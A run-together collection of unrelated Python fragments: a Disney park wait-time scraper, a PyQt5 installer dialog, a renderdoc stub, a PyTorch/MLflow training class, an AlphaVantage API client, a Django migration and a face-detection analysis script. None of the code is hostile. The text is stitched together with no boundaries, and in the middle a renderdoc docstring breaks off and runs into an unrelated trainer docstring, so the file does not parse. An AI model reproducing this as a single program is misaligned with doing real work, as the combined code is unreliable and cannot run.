op_index.append(i) elif rawdata['entries'][i]['waitTime']['status'] == 'Down': operating_or_not.append(['Down']) op_index.append(i) else: operating_or_not.append(['Closed']) data = dict(zip(self.names,operating_or_not)) data = pd.DataFrame.from_dict(data) data = data[self.names] Time = pd.Series([self.timeretrieved]) data['mytime'] = Time time_indeces = [self.size] op_index.extend(time_indeces) return(operating_or_not,op_index) def get_scheduledata(self,startDate = False,endDate = False): """Cleans Schedule Data, Can Be Used Seperately to Find Schedule Of Specified Range. startDate and endDate Format is string "YYYY-MM-DD" """ if startDate: rawdata = self.__get_rawscheduledata(startDate=startDate,endDate = endDate) else: rawdata = self.rawscheduledata for i in range(0,len(rawdata['activities'])): if rawdata['activities'][i]['id'].split(';')[0] == str(self.parkid): rightdata = rawdata['activities'][i]['schedule']['schedules'] for j in range(0,len(rightdata)): if rightdata[j]['type']=='Operating': tempdata = pd.DataFrame(rightdata[j],index=[0]) data = tempdata return(data.reset_index(drop=True)) # In[4]: class Disneyland(disney_park): def get_parkcoord(self): return({'lat':33.8121,'lon':-117.9190}) def get_parkid(self): return(330339) def get_resortid(self): return(80008297) def can_get_fastpass(self): return(True) class CaliforniaAdventure(disney_park): def get_parkid(self): return(336894) def get_resortid(self): return(80008297) def can_get_fastpass(self): return(True) class MagicKingdom(disney_park): def get_parkid(self): return(80007944) def get_resortid(self): return(80007798) def can_get_fastpass(self): return(True) # -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'interfaz_1.ui' # # Created by: PyQt5 UI code generator 5.4.1 # # WARNING! All changes made in this file will be lost! 
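# A minimal usage sketch for the generated class defined below (illustrative
# only: the QDialog container and the __main__ guard are assumptions, not part
# of interfaz_1.ui, and assets/facyt.png / assets/log_uc.png must exist
# relative to the working directory):
#
#     import sys
#     from PyQt5 import QtWidgets
#
#     if __name__ == "__main__":
#         app = QtWidgets.QApplication(sys.argv)
#         dialog = QtWidgets.QDialog()
#         ui = Ui_instalador_interfaz_1()
#         ui.setupUi(dialog)   # builds the widgets and calls retranslateUi()
#         dialog.show()
#         sys.exit(app.exec_())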
from PyQt5 import QtCore, QtGui, QtWidgets class Ui_instalador_interfaz_1(object): def setupUi(self, instalador_interfaz_1): instalador_interfaz_1.setObjectName("instalador_interfaz_1") instalador_interfaz_1.setEnabled(True) instalador_interfaz_1.resize(684, 454) instalador_interfaz_1.setMinimumSize(QtCore.QSize(684, 454)) instalador_interfaz_1.setMaximumSize(QtCore.QSize(684, 454)) self.facyt_logo = QtWidgets.QLabel(instalador_interfaz_1) self.facyt_logo.setGeometry(QtCore.QRect(40, 220, 141, 161)) self.facyt_logo.setText("") self.facyt_logo.setPixmap(QtGui.QPixmap("assets/facyt.png")) self.facyt_logo.setScaledContents(True) self.facyt_logo.setObjectName("facyt_logo") self.uc_logo = QtWidgets.QLabel(instalador_interfaz_1) self.uc_logo.setGeometry(QtCore.QRect(50, 40, 111, 161)) self.uc_logo.setText("") self.uc_logo.setPixmap(QtGui.QPixmap("assets/log_uc.png")) self.uc_logo.setScaledContents(True) self.uc_logo.setObjectName("uc_logo") self.layoutWidget = QtWidgets.QWidget(instalador_interfaz_1) self.layoutWidget.setGeometry(QtCore.QRect(190, 10, 483, 421)) self.layoutWidget.setObjectName("layoutWidget") self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.layoutWidget) self.verticalLayout_2.setContentsMargins(0, 0, 0, 0) self.verticalLayout_2.setObjectName("verticalLayout_2") self.verticalLayout = QtWidgets.QVBoxLayout() self.verticalLayout.setObjectName("verticalLayout") self.label = QtWidgets.QLabel(self.layoutWidget) self.label.setStyleSheet("font: 75 bold 22pt \"Ubuntu\";") self.label.setWordWrap(True) self.label.setObjectName("label") self.verticalLayout.addWidget(self.label) spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding) self.verticalLayout.addItem(spacerItem) self.label_2 = QtWidgets.QLabel(self.layoutWidget) self.label_2.setStyleSheet("font: 63 14pt \"Ubuntu\";") self.label_2.setWordWrap(True) self.label_2.setObjectName("label_2") self.verticalLayout.addWidget(self.label_2) spacerItem1 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding) self.verticalLayout.addItem(spacerItem1) spacerItem2 = QtWidgets.QSpacerItem(20, 118, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding) self.verticalLayout.addItem(spacerItem2) self.verticalLayout_2.addLayout(self.verticalLayout) self.horizontalLayout = QtWidgets.QHBoxLayout() self.horizontalLayout.setObjectName("horizontalLayout") spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout.addItem(spacerItem3) spacerItem4 = QtWidgets.QSpacerItem(108, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout.addItem(spacerItem4) self.anterior = QtWidgets.QPushButton(self.layoutWidget) self.anterior.setEnabled(False) self.anterior.setAutoDefault(True) self.anterior.setObjectName("anterior") self.horizontalLayout.addWidget(self.anterior) self.siguiente = QtWidgets.QPushButton(self.layoutWidget) self.siguiente.setObjectName("siguiente") self.horizontalLayout.addWidget(self.siguiente) spacerItem5 = QtWidgets.QSpacerItem(28, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout.addItem(spacerItem5) self.cancelar = QtWidgets.QPushButton(self.layoutWidget) self.cancelar.setObjectName("cancelar") self.horizontalLayout.addWidget(self.cancelar) self.verticalLayout_2.addLayout(self.horizontalLayout) self.retranslateUi(instalador_interfaz_1) QtCore.QMetaObject.connectSlotsByName(instalador_interfaz_1) def 
retranslateUi(self, instalador_interfaz_1): _translate = QtCore.QCoreApplication.translate instalador_interfaz_1.setWindowTitle(_translate("instalador_interfaz_1", "OJ+ Instalador")) self.label.setText(_translate("instalador_interfaz_1", "Bienvenido al instalador para el Juez En Linea OJ+")) self.label_2.setText(_translate("instalador_interfaz_1", "Este instalador lo guiará durante el proceso de instalación del Juez OJ+ en su computador.")) self.anterior.setText(_translate("instalador_interfaz_1", "Anterior")) self.siguiente.setText(_translate("instalador_interfaz_1", "Siguiente")) self.cancelar.setText(_translate("instalador_interfaz_1", "Cancelar"))# encoding: utf-8 # module renderdoc # from P:\1-Scripts\_Python\Py-Autocomplete\renderdoc.pyd # by generator 1.146 # no doc # imports import enum as __enum from .SwigPyObject import SwigPyObject class APIProperties(SwigPyObject): """ Gives some API-specific information about the capture. """ def __eq__(self, *args, **kwargs): # real signature unknown """ Return self==value. """ pass def __ge__(self, *args, **kwargs): # real signature unknown """ Return self>=value. """ pass def __gt__(self, *args, **kwargs): # real signature unknown """ Return self>value. """ pass def __hash__(self, *args, **kwargs): # real signature unknown """ Return hash(self). """ pass def __init__(self, *args, **kwargs): # real signature unknown pass def __le__(self, *args, **kwargs): # real signature unknown """ Return self<=value. """ pass def __lt__(self, *args, **kwargs): # real signature unknown """ Return self0, the train and testset will be saved in multiple .pt chunks. Specifies how many samples are stored in a chunk. If <=0, saving and loading of torch datasets will not be changed. """ def __init__( self, model_creation_function, data_source_paths: list, save_path, dataset_split_path=None, cache_path=None, batch_size: int = 1, train_print_frequency: int = 10, epochs: int = 10, dummy_epoch=True, produce_torch_datasets_only=False, num_workers: int = 10, num_validation_samples: int = 10, num_test_samples: int = 10, data_root: Path = r.data_root, data_processing_function=None, data_gather_function=None, looping_strategy=None, cache_mode=td.CachingMode.FileList, loss_criterion=MSELoss(), optimizer_function=lambda params: torch.optim.Adam(params, lr=0.0001), lr_scheduler_function=None, optimizer_path=None, classification_evaluator_function=None, checkpointing_strategy=CheckpointingStrategy.Best, run_eval_step_before_training=False, dont_care_num_samples=False, use_mixed_precision=False, sampler=None, caching_torch=True, demo_path=None, resize_label_to=(0, 0), load_test_set_in_training_mode=False, hold_samples_in_memory=True, run_name='', save_in_mlflow_directly=False, drop_last_batch=False, torch_datasets_chunk_size=0 ): # Visit the following URL to check the MLFlow dashboard. set_tracking_uri("http://swt-clustermanager.informatik.uni-augsburg.de:5000") # Setting the experiment: normally, it is the Slurm jobname, if the script is not called with slurm, # it is the name of calling script, which should help categorizing experiments as well. 
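# --- Hedged aside on the statement that follows: the experiment name is the Slurm job name when
# the script runs under Slurm, otherwise the stem of the calling script. derive_experiment_name
# is a hypothetical helper added here only to spell that expression out.
import os
import sys
from pathlib import Path


def derive_experiment_name() -> str:
    # os.getenv returns the default (the script path) when SLURM_JOB_NAME is unset,
    # i.e. when the script was not started via sbatch/srun.
    return Path(os.getenv("SLURM_JOB_NAME", Path(sys.argv[0]))).stem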
set_experiment(f"{Path(os.getenv('SLURM_JOB_NAME', Path(sys.argv[0]))).stem}") start_run(run_name=run_name) set_tag("User", getpass.getuser()) if save_in_mlflow_directly and get_artifact_uri() is not None: self.save_path = Path(get_artifact_uri()) else: initial_timestamp = str(datetime.now().strftime("%Y-%m-%d_%H-%M-%S")) self.save_path = save_path / initial_timestamp self.save_path.mkdir(parents=True, exist_ok=True) self.save_in_mlflow_directly = save_in_mlflow_directly self.cache_path = cache_path self.train_print_frequency = train_print_frequency self.data_source_paths = data_source_paths self.batch_size = batch_size self.load_datasets_path = dataset_split_path self.epochs = epochs self.dummy_epoch = dummy_epoch self.produce_torch_datasets_only = produce_torch_datasets_only if produce_torch_datasets_only and not dummy_epoch: raise ValueError("Can't do a cache only run without enabling dummy_epoch!") self.num_workers = num_workers self.num_validation_samples = num_validation_samples self.num_test_samples = num_test_samples self.data_processing_function = data_processing_function self.data_gather_function = data_gather_function self.looping_strategy = looping_strategy self.cache_mode = cache_mode self.data_generator = None self.test_data_generator = None self.model = None self.model_creation_function = model_creation_function self.model_name = "Model" self.logger = logging.getLogger(__name__) self.best_loss = np.finfo(float).max self.sampler = sampler self.demo_path = demo_path if demo_path is not None: caching_torch = False if caching_torch: load_and_save_path, data_loader_hash = handle_torch_caching(self.data_processing_function, self.data_source_paths, self.sampler, self.batch_size, self.num_validation_samples, self.num_test_samples) self.data_loader_hash = data_loader_hash if produce_torch_datasets_only: self.load_torch_dataset_path = None else: self.load_torch_dataset_path = load_and_save_path self.save_torch_dataset_path = load_and_save_path self.save_torch_dataset_path.mkdir(exist_ok=True, parents=True) else: self.data_loader_hash = "NOT_CACHING" self.load_torch_dataset_path = None self.save_torch_dataset_path = None if self.demo_path is not None: self.data_loader_hash = "DEMO_MODE" self.load_torch_dataset_path = Path(self.demo_path) self.save_torch_dataset_path = Path(self.demo_path) self.optimizer_function = optimizer_function self.lr_scheduler_function = lr_scheduler_function self.lr_scheduler = None self.optimizer_path = optimizer_path self.optimizer = None self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") self.loss_criterion = loss_criterion self.checkpointing = checkpointing_strategy self.classification_evaluator_function = classification_evaluator_function self.classification_evaluator = None self.run_eval_step_before_training = run_eval_step_before_training self.dont_care_num_samples = dont_care_num_samples self.drop_last_batch = drop_last_batch self.use_mixed_precision = use_mixed_precision self.resize_label = resize_label_to self.load_test_set_in_training_mode = load_test_set_in_training_mode self.hold_samples_in_memory = hold_samples_in_memory self.torch_datasets_chunk_size = torch_datasets_chunk_size self.data_root = data_root def __create_datagenerator(self, test_mode=False): try: generator = td.LoopingDataGenerator( self.data_source_paths, self.data_gather_function, self.data_processing_function, batch_size=self.batch_size, num_validation_samples=self.num_validation_samples, num_test_samples=self.num_test_samples, 
split_load_path=self.load_datasets_path, split_save_path=self.save_path, split_data_root=self.data_root, num_workers=self.num_workers, cache_path=self.cache_path, cache_mode=self.cache_mode, looping_strategy=self.looping_strategy, save_torch_dataset_path=self.save_torch_dataset_path, load_torch_dataset_path=self.load_torch_dataset_path, dont_care_num_samples=self.dont_care_num_samples, test_mode=test_mode, sampler=self.sampler, load_test_set_in_training_mode=self.load_test_set_in_training_mode, drop_last_batch=self.drop_last_batch, hold_samples_in_memory=self.hold_samples_in_memory, torch_datasets_chunk_size=self.torch_datasets_chunk_size ) except Exception: logger = logging.getLogger(__name__) logger.exception("Fatal Error:") exit() return generator def __get_model_def(self): model_as_str = self.model_name + ": \n" if self.model.__class__.__name__ == "DataParallel": m = list(self.model.children())[0] else: m = self.model for c in m.named_children(): if len(list(c[1].parameters())) == 0: model_as_str += str(c) model_as_str += " \n" continue else: # If first parameter of layer is frozen, so is the rest of the layer -> parameters()[0] model_as_str += "~~ " if not list(c[1].parameters())[0].requires_grad else "" model_as_str += str(c) model_as_str += " ~~ \n" if not list(c[1].parameters())[0].requires_grad else " \n" return model_as_str def __print_info(self): param_count = count_parameters(self.model) sched_str = self.lr_scheduler.__class__.__name__ + f" \n{self.lr_scheduler.state_dict()}" \ if self.lr_scheduler is not None else "None" # Log file self.logger.info("###########################################") self.logger.info(">>> Model Trainer INFO <<<") self.logger.info(f"Loss criterion: {self.loss_criterion}") self.logger.info(f"Optimizer: {self.optimizer}") self.logger.info(f"LR scheduler: {sched_str}") self.logger.info(f"Batch size: {self.batch_size}") self.logger.info(f"Model: {self.model}") self.logger.info(f"Parameter count: {param_count}") self.logger.info("###########################################") # ML Flow log_param("General/LossCriterion", f"{self.loss_criterion}") log_param("General/BatchSize", f"{self.batch_size}") log_param("General/Epochs", f"{self.epochs}") log_param("General/MixedPrecision", f"{self.use_mixed_precision}") optim_str = str(self.optimizer).replace("\n", " \n") log_param("Optimizer/Optimizer", f"{optim_str}") log_param("Optimizer/LRScheduler", f"{sched_str}") log_param("Model/Structure", f"{self.__get_model_def()}") log_param("Model/ParamCount", f"{param_count}") if hasattr(self.model, "round_at") and self.model.round_at is not None: log_param("Model/Threshold", f"{self.model.round_at}") log_param("Data/SourcePaths", f"{[str(p) for p in self.data_source_paths]}") log_param("Data/CheckpointSourcePath", f"{self.load_datasets_path}") dl_info = self.data_processing_function.__self__.__dict__ dl_info["data_processing_function"] = self.data_processing_function.__name__ dl_str = ' \n'.join([f"{k}: {dl_info[k]}" for k in dl_info if dl_info[k] is not None]) log_param("Data/DataLoader", f"{dl_str}") def __create_model_and_optimizer(self): logger = logging.getLogger(__name__) logger.info("Generating Model") if not self.use_mixed_precision: if self.model is None: self.model = self.model_creation_function() self.model_name = self.model.__class__.__name__ if "swt-dgx" in socket.gethostname(): logger.info("Invoking data parallel model.") self.model = nn.DataParallel(self.model).to("cuda:0") else: self.model = self.model.to("cuda:0" if torch.cuda.is_available() else "cpu") 
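# --- Hedged aside: wrapping the model in nn.DataParallel (as done just above on "swt-dgx" hosts)
# prefixes every state_dict key with "module.", which is why __load_checkpoint() further down
# strips that prefix when loading on a single-GPU or CPU machine. Minimal illustration with a toy
# module (assumes only that PyTorch is installed; runs on CPU):
import torch.nn as nn

toy = nn.Linear(4, 2)
wrapped = nn.DataParallel(toy)
print(list(toy.state_dict())[0])      # 'weight'
print(list(wrapped.state_dict())[0])  # 'module.weight'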
self.create_optimizer_and_lr_scheduler() else: if self.model is None: self.model = self.model_creation_function() self.model_name = self.model.__class__.__name__ self.create_optimizer_and_lr_scheduler() self.model = self.model.cuda() self.model, self.optimizer = amp.initialize(self.model, self.optimizer, opt_level="O1") if "swt-dgx" in socket.gethostname(): logger.info("Invoking data parallel model.") self.model = nn.DataParallel(self.model).to("cuda:0") def create_optimizer_and_lr_scheduler(self): if self.optimizer is None: if self.optimizer_path is None: self.optimizer = self.optimizer_function(self.model.parameters()) else: self.logger.info(f'Loading optimizer state from {self.optimizer_path}') self.optimizer = self.optimizer_function(self.model.parameters()) checkpoint = torch.load(self.optimizer_path) self.optimizer.load_state_dict(checkpoint['optimizer_state_dict']) if self.lr_scheduler_function is not None: self.lr_scheduler = self.lr_scheduler_function(self.optimizer) def start_training(self,): """ Sets up training and logging and starts train loop """ # self.save_path.mkdir(parents=True, exist_ok=True) if self.demo_path is not None: print(f"Running in demo mode. Please refer to {self.save_path} for logs et al.") logging_cfg.apply_logging_config(self.save_path) self.classification_evaluator = self.classification_evaluator_function() logger = logging.getLogger(__name__) logger.info("Generating Generator") self.data_generator = self.__create_datagenerator() if self.data_generator.loaded_train_set: self.dummy_epoch = False logger.info("Saving code and generating SLURM script for later evaluation") eval_preparation(self.save_path) self.__create_model_and_optimizer() self.__print_info() if self.dummy_epoch: logger.info("Prefetching a dummy epoch to get proper shuffling on the first training epoch") start_time = time.time() for i, _ in enumerate(self.data_generator): ctime = time.time() if ctime - start_time > 60: start_time = ctime logger.info(f"Fetched {i} batches.") logger.info(f"Total number of samples: {len(self.data_generator)}") if self.run_eval_step_before_training: logger.info("Running eval before training to see, if any training happens") validation_loss = self.__eval(self.data_generator.get_validation_samples(), 0, 0) log_metric("Validation/Loss", validation_loss, 0) if self.produce_torch_datasets_only: logger.info(f"Triggering caching, saving all datasets to {self.save_torch_dataset_path}") logger.info("Training dataset ...") iter(self.data_generator) logger.info("Validation dataset ...") _ = self.data_generator.get_validation_samples() logger.info("Test dataset ...") _ = self.data_generator.get_test_samples() else: logger.info("The Training Will Start Shortly") self.__train_loop() if not self.save_in_mlflow_directly: log_artifacts(self.save_path) logging.shutdown() end_run() def __train_loop(self): start_time = time.time() eval_step = 0 step_count = 0 for epoch in range(self.epochs): i = 0 self.logger.info(f"Starting epoch {epoch}") epoch_start = time.time() for inputs, label, aux in self.data_generator: inputs = inputs.to(self.device, non_blocking=True) label = label.to(self.device, non_blocking=True) self.optimizer.zero_grad() outputs = self.model(inputs) label = self.resize_label_if_necessary(label) loss = self.loss_criterion(outputs, label) log_metric("Training/Loss", loss.item(), step_count) if not self.use_mixed_precision: loss.backward() else: with amp.scale_loss(loss, self.optimizer) as scaled_loss: scaled_loss.backward() self.optimizer.step() if i % 
self.train_print_frequency == 0 and i != 0: time_delta = time.time() - start_time if len(self.data_generator) == 0: progress = 0 else: progress = i / (len(self.data_generator) / self.batch_size) eta = (len(self.data_generator) / self.batch_size - i) * ((time.time() - epoch_start) / i) hours = f"{eta // 3600}h " if eta // 3600 > 0 else "" self.logger.info( f"Loss: {loss.item():12.4f} || Duration of step {step_count:6}: {time_delta:10.2f} s; " f"{progress * 100:.2f}% of epoch done; ETA {hours}{(eta % 3600) // 60:.0f}min {eta % 60:.0f}s" ) start_time = time.time() i += 1 step_count += 1 validation_loss = self.__eval(self.data_generator.get_validation_samples(), eval_step, step_count) log_metric("Validation/Loss", validation_loss, step_count) if self.lr_scheduler is not None: old_lr = [pg['lr'] for pg in self.optimizer.state_dict()['param_groups']] self.lr_scheduler.step() self.logger.info(f"LR scheduler step; LR: {old_lr} -> " f"{[pg['lr'] for pg in self.optimizer.state_dict()['param_groups']]}") eval_step += 1 def __eval(self, data_set, eval_step=0, step_count=0, test_mode=False): """Evaluators must have a commit, print and reset function. commit updates the evaluator with the current step, print can show all relevant stats and reset resets the internal structure if needed." """ with torch.no_grad(): self.model.eval() loss = 0 count = 0 for i, (data, label, aux) in enumerate( self.__batched(data_set, self.batch_size) ): auxs = list(td.split_aux_dicts(aux)) data = data.to(self.device, non_blocking=True) label = label.to(self.device, non_blocking=True) # data = torch.unsqueeze(data, 0) # label = torch.unsqueeze(label, 0) output = self.model(data) label = self.resize_label_if_necessary(label) current_loss = self.loss_criterion(output, label).item() loss = loss + current_loss count += 1 output = output.cpu() label = label.cpu() data = data.cpu() if self.classification_evaluator is not None: self.classification_evaluator.commit(output, label, data, auxs) loss = loss / count self.logger.info(f"{eval_step} Mean Loss on Eval: {loss:8.8f}") if self.classification_evaluator is not None: self.classification_evaluator.print_metrics(step_count) self.classification_evaluator.reset() self.model.train() if not test_mode: if self.checkpointing == CheckpointingStrategy.Best and loss < self.best_loss: self.__save_checkpoint(eval_step, loss) self.best_loss = loss elif self.checkpointing == CheckpointingStrategy.All: self.__save_checkpoint(eval_step, loss, fn=f"checkpoint_{eval_step}.pth") return loss def resize_label_if_necessary(self, label): """ Resize the label: saves online storage by making it possible to use the bigger image labels of 1140 sensors also for 80 and 20 sensors :param label: :return: """ if self.resize_label != (0, 0): label = torch.nn.functional.interpolate(label.reshape(-1, 1, label.shape[1], label.shape[2]), self.resize_label) label = label.squeeze() return label def __save_checkpoint(self, eval_step, loss, fn=r.chkp): torch.save( { "epoch": eval_step, "model_state_dict": self.model.state_dict(), "optimizer_state_dict": self.optimizer.state_dict(), "loss": loss, }, self.save_path / Path(fn), ) def __load_checkpoint(self, path): """Loads the parameters of a previously saved model and optimizer, loss and epoch. See the official PyTorch docs for more details: https://pytorch.org/tutorials/beginner/saving_loading_models.html Args: path (Path): Path to the stored checkpoint. 
""" if torch.cuda.is_available(): checkpoint = torch.load(path) else: checkpoint = torch.load(path, map_location="cpu") new_model_state_dict = OrderedDict() model_state_dict = checkpoint["model_state_dict"] if "swt-dgx" not in socket.gethostname(): for k, v in model_state_dict.items(): if k.startswith("module"): k = k[7:] # remove `module.` new_model_state_dict[k] = v self.model.load_state_dict(new_model_state_dict) else: self.model.load_state_dict(model_state_dict) self.optimizer.load_state_dict(checkpoint["optimizer_state_dict"]) epoch = checkpoint["epoch"] loss = checkpoint["loss"] return epoch, loss def __batched(self, data_l: list, batch_size: int): return DataLoader(data_l, batch_size=batch_size, shuffle=False, drop_last=self.drop_last_batch) def inference_on_test_set(self, output_path: Path = None, checkpoint_path: Path = None, classification_evaluator_function=None): """Start evaluation on a dedicated test set. Args: output_path: Directory for test outputs. checkpoint_path : ... classification_evaluator_function: lambda with Evaluator object that should be used for the test run. """ if output_path is not None: save_path = output_path / "eval_on_test_set" save_path.mkdir(parents=True, exist_ok=True) else: save_path = self.save_path if self.demo_path is not None: print(f"Eval - running in demo mode. Please refer to {save_path.absolute()} for log / results.") logging_cfg.apply_logging_config(save_path, eval=True) logger = logging.getLogger(__name__) self.__create_model_and_optimizer() logger.info("Generating Test Generator") data_generator = self.__create_datagenerator(test_mode=True) logger.info("Loading Checkpoint") if checkpoint_path is not None: logger.info(f"Loading Checkpoint: {checkpoint_path}") self.__load_checkpoint(checkpoint_path) else: logger.info(f"Loading Checkpoint: {self.save_path / r.chkp}") self.__load_checkpoint(self.save_path / r.chkp) data_list = data_generator.get_test_samples() if classification_evaluator_function is not None: self.classification_evaluator = classification_evaluator_function() logger.info("Starting inference") self.__eval(data_list, test_mode=True) logger.info("Inference completed.") logging.shutdown() import requests from os import listdir from os.path import isfile, join import glob import json class AlphaVantageController(object): def __init__(self, key): self.key = key self.endpointfactory = AlphaVantageEndpointFactory(key) def makeTimeSeriesRequest(self,function,symbol,interval,outputsize): factory = self.endpointfactory options = {"symbol":symbol,"interval":interval,"outputsize":outputsize} endpoint = factory.makeEndpoint(function,options) response = requests.get(endpoint) data = json.loads(response.text) return data def makeApiRequest(self,function,options): factory = self.endpointfactory endpoint = factory.makeEndpoint(function,options) response = requests.get(endpoint) data = json.loads(response.text) return data def makeCryptoRequest(self,symbol,fiat): None def readSymbolsFromFile(self,filename,clean_method = lambda x : x, column = 0, separator = ",", startline = 0): if(filename == None or filename == ""): raise ValueError("Filename must not be empty") with open(filename) as f: content = f.readlines() symbols = [] for i in range(startline, len (content)): line = content[i] symbol = line.split(separator)[column] cleaned_symbol = clean_method(symbol) symbols.append(cleaned_symbol) return symbols def readSymbolsFromMultipleFiles(self,filenames,clean_method = lambda x : x,column = 0,separator = ",",startline = 0): if(filenames == None or 
len(filenames) == 0): raise ValueError("Filenames cant be None or empty") all_symbols = [] for filename in filenames: symbols = self.readSymbolsFromFile(filename,clean_method,column,separator,startline) all_symbols.extend(symbols) return all_symbols class AlphaVantageEndpointFactory(object): base_url = "https://www.alphavantage.co/query?" intervals = ["1min","5min","15min","30min","60min"] outputsizes = ["compact","full"] outputsize_default = "compact" requirements_file = "alpha_vantage_api_requirements.txt" def __init__(self,apikey): self.apikey = apikey self.requirements = self.readRequirements() def makeEndpoint(self,function,options): options["apikey"] = self.apikey keys = options.keys() reqs = self.requirements #Checks if the function is valid and supported if(function == "" or function == None or function not in reqs.keys()): raise ValueError("Not a valid function") #Find the fields required for the spesific function function_requirements = reqs[function] required_options = [k for k,v in function_requirements.iteritems() if v == "required"] #Check if some of required option are not present for option in required_options: if(option not in keys): raise ValueError("Not all required fields are present. Missing " + option) url = self.base_url #Check if the options provided are supported for key in keys: if(function_requirements[key] == "none"): raise ValueError("This option " + key + " is not supported by function " + function) #Build the url url += "function=" + function for option,param in options.iteritems(): url += "&" url += option + "=" + param return url def readRequirements(self): requirements = {} with open(self.requirements_file) as f: content = f.readlines() params = content[0].split(";") for i in range(1, len(content)): line = content[i] options = line.split(";") function_name = options[0] options_dict = {} for j in range(1,len(options)): param = params[j] option = options[j] options_dict[param] = option requirements[function_name] = options_dict return requirements def readSettings(self): settings = {} with open("alpha_vantage_setting.txt") as f: content = f.readlines() for line in content: setting = line.split("=") variable = setting[0] value = setting[1] settings[variable] = value return settings def parseSettings(self): None 0 # Generated by Django 3.0.4 on 2020-05-21 16:50 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Variable', fields=[ ('name', models.CharField(max_length=100, primary_key=True, serialize=False, verbose_name='Name')), ('value', models.CharField(max_length=100, verbose_name='Wert')), ], ), ] # -*-coding=utf-8-*- import matplotlib.font_manager a = sorted([f.name for f in matplotlib.font_manager.fontManager.ttflist]) for i in a: print(i) playground/face_detection_playground.py import pandas as pd import numpy as np import matplotlib.pyplot as plt from experiment_handler.label_data_reader import read_experiment_phases, read_location_labels, read_activity_labels_from_eyetracker_labelling from experiment_handler.face_det_reader import get_face_detection_data from feature_calculations.colocation.common import get_colocation_labels, get_location_of_persons_at_samples def face_detection_vs_location(exp_root): phases = read_experiment_phases(experiment) start = phases['assembly'][0] end = phases['disassembly'][1] face_detections = get_face_detection_data(exp_root, start, end, "video") loc_labels = read_location_labels(exp_root) infos = [] for p in 
loc_labels.keys(): detections_for_person = face_detections.loc[face_detections["person_id"] == p] for label in loc_labels[p]: during_label = detections_for_person.loc[ detections_for_person["timestamp"].between(label["start"], label["end"])] current = { "person_id": p, "location": label["location"], "duration": label["end"] - label["start"], "face_count": during_label["timestamp"].size, } infos.append(current) infos = pd.DataFrame(infos) locations = infos["location"].unique() for loc in locations: at_location = infos.loc[infos["location"] == loc] print(loc, at_location["face_count"].sum()/at_location["duration"].sum(), at_location["duration"].sum()) def face_detection_vs_activity(experiment, replacements, remove_labels): phases = read_experiment_phases(experiment) start = phases['assembly'][0] end = phases['disassembly'][1] activity_labels = read_activity_labels_from_eyetracker_labelling(experiment, "video", replacements, remove_labels) activity_labels.drop_duplicates(inplace=True) face_detections = get_face_detection_data(experiment, start, end, "video") activity_labels["duration"] = activity_labels["end"] - activity_labels["start"] activities = activity_labels["label"].unique() persons = activity_labels["subject"].unique() infos = [] for p in persons: detections_for_person = face_detections.loc[face_detections["person_id"] == p] for index, label in activity_labels.loc[activity_labels["subject"] == p].iterrows(): during_label = detections_for_person.loc[detections_for_person["timestamp"].between(label["start"], label["end"])] current = { "person_id": p, "activity": label["label"], "duration": label["end"] - label["start"], "face_count": during_label["timestamp"].size, } infos.append(current) infos = pd.DataFrame(infos) #print(infos) for act in activities: at_location = infos.loc[infos["activity"] == act] print(act, at_location["face_count"].sum()/at_location["duration"].sum(), at_location["duration"].sum()) f, axarr = plt.subplots(4, sharex=True, figsize=(16, 10)) for idx, test_for in enumerate(["P1", "P2", "P3", "P4"]): person_dets = face_detections.loc[face_detections["person_id"] == test_for] face_det_times = person_dets["timestamp"].as_matrix() face_det_y = np.ones(len(face_det_times))*6.4 axarr[idx].plot(face_det_times, face_det_y, '|', ms=10, color="red", label="face detections") height = 0.05 for index, label in activity_labels.loc[activity_labels["subject"] == test_for].iterrows(): y_pos = (list(activities).index(label["label"])) / (len(activities)) + 0.08 axarr[idx].axvspan(label["start"], label["end"], y_pos - height / 2, y_pos + height / 2, color="#1f77b4") axarr[idx].grid() axarr[idx].legend() axarr[idx].set_title(test_for) axarr[idx].set_ylabel("Activity") axarr[idx].set_yticks(range(1, len(activities) + 1)) axarr[idx].set_ylim([0.5, 6.5]) axarr[idx].set_yticklabels(activities) plt.xlabel("Time [s]") plt.show() def face_detection_vs_colocation(exp_root): step = 5 window_length = 15 # seconds phases = read_experiment_phases(experiment) start = phases['assembly'][0] end = phases['disassembly'][1] sample_times = np.arange(start, end, step) location_labels = read_location_labels(exp_root) locations = get_location_of_persons_at_samples(location_labels, sample_times, exp_root) colocation_labels = get_colocation_labels(locations) face_detections = get_face_detection_data(experiment, start, end, "video") persons = ["P1", "P2", "P3", "P4"] results = [] for p in persons: persons_face_detections = face_detections.loc[face_detections["person_id"] == p] for t in sample_times: 
faces_in_window = persons_face_detections.loc[ persons_face_detections["timestamp"].between(t - window_length, t)] colocated = 0 colocated_max = window_length / step + 1 # check in windows (number of person colocated with) for pp in persons: if p == pp: continue p_vs_pp_col = colocation_labels[p][pp] tmp = p_vs_pp_col[p_vs_pp_col[:, 0] >= t - window_length, :] tmp = tmp[tmp[:, 0] <= t, :] colocated += (np.sum(tmp, axis=0)[1] * 100 / colocated_max) facecount = faces_in_window["timestamp"].size current_result = { "person_id": p, "colocated": colocated, "face_count": facecount, "timestamp": t } results.append(current_result) results = pd.DataFrame(results) x_values = results["colocated"].unique() print(x_values) x_values = [100, 200, 300] titles = ["Co-located with one participant", "Co-located with two participants", "Co-located with three participants"] y_values = [] for x in x_values: x_range = 10 tmp = results.loc[results["colocated"].between(x - x_range, x + x_range), "face_count"].as_matrix() y_values.append(tmp[tmp < 1000]) print(x_values) f, axarr = plt.subplots(1, 3, sharey=True, figsize=(16, 5)) n_bin = 30 for i in range(0, 3): axarr[i].hist(y_values[i], bins=n_bin) axarr[i].set_title(titles[i]) axarr[i].grid() axarr[i].set_ylabel("Count") 